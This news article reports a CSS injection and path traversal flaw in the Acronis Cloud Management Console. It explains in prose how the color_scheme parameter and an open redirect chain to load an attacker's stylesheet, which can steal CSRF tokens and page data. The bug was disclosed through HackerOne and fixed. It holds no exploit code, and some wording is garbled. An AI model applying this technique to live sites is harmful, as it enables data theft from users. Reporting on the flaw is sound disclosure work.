A security researcher discovered a CSS injection flaw in Acronis software that could be exploited for data theft. On November 4, ‘Medi’ (under the alias ‘mr-medi’), published a technical analysis of the vulnerability, describing a client-side path traversal attack as the “favorite bug” they discovered.
A vulnerability exists in the Acronis Cloud Management Console. The software manages Acronis services, including cloud backups and resource monitoring. According to the researcher, the web-facing URL automatically pulls a GET parameter called color_scheme. Then, when a GET request is made, the CSS file is also requested and loaded.
However, when this CSS file is queried, the front-end code does not sanitize the values, so it is possible for an attacker to perform path traversal by requesting the same file from a different path. This relative path overwrite is not inherently a significant bug unless you combine it with an open redirect, which allows an attacker to issue a request and force a redirect to an external domain where a malicious CSS file is stored.
Medi discovered a vulnerable API endpoint and location HTTP header combination in which the user can control the GET parameter. This allowed the researcher to create an exploit with the color_scheme parameter and redirect to the domain so that user information could be extracted “using CSS attributes”.
The information includes cross-site request forgery (CSRF) tokens, personal data, partner hashes, and other data contained in the Document Object Model (DOM) into which the generated CSS file is injected. “If we specify our CSS file on a hosted domain, we can perform a CSRF attack via GET requests by loading an external image using CSS properties such as background-image or by collecting user information such as [an] IP, referrer header. User. . agent,” explained the researcher. “I used my local server, but you can look it up on any external domain you own.”
Medi told The Daily Swig: “Since this is a client-side based attack, the main risk is the information found in the vulnerable page and CSRF attacks. The type of bug depends on how JavaScript handles user input and the purpose of that parameter.
A chain reaction
A video-based proof-of-concept (PoC) attack has been published. Medi also notes that this technique is associated with relative path overwrites and path-relative stylesheet import (PRSSI) vulnerabilities.
“For example, in Acronis, the vulnerable page is an admin dashboard that contains valuable information about their customers [and] the parameter is used to dynamically apply styles… Other scenarios can lead to XSS with serious issues like CSRF. Any HTTP method.”
Medi’s findings were disclosed privately by the HackerOne platform and the flaw was fixed on January 13. A $250 bug bounty was awarded. Medi has confirmed that the bug has been fixed. At HackerOne, the Acronis team compared the security flaw to a mirrored cross-site scripting (XSS) attack, which results in a lower bug bounty but exposes user data when color_scheme is in use. Daily Swig has reached out to Acronis for further comment and will update this story when we hear back.